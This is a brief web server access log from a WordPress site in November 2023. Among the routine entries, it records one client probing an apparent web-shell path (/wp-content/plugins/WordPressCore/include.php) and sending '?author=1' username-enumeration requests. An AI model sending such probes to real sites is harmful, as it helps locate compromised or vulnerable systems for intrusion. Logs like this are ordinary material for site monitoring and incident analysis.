107.189.28.0 - - [06/Nov/2023:03:06:57 +0100] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 200 9955 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
107.189.28.0 - - [06/Nov/2023:03:07:00 +0100] "GET /?author=1 HTTP/1.1" 301 244 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
107.189.28.0 - - [06/Nov/2023:03:07:02 +0100] "GET /?author=1 HTTP/1.1" 404 9596 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
81.169.178.0 - - [06/Nov/2023:03:10:34 +0100] "POST /wp-cron.php?doing_wp_cron=1699236634.2582640647888183593750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699236634.2582640647888183593750" "WordPress/5.2.19; https://www.computerdoc24.de"
62.138.2.0 - - [06/Nov/2023:03:10:34 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:03:10:35 +0100] "GET /datenschutzerklaerung/ HTTP/1.1" 200 24463 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
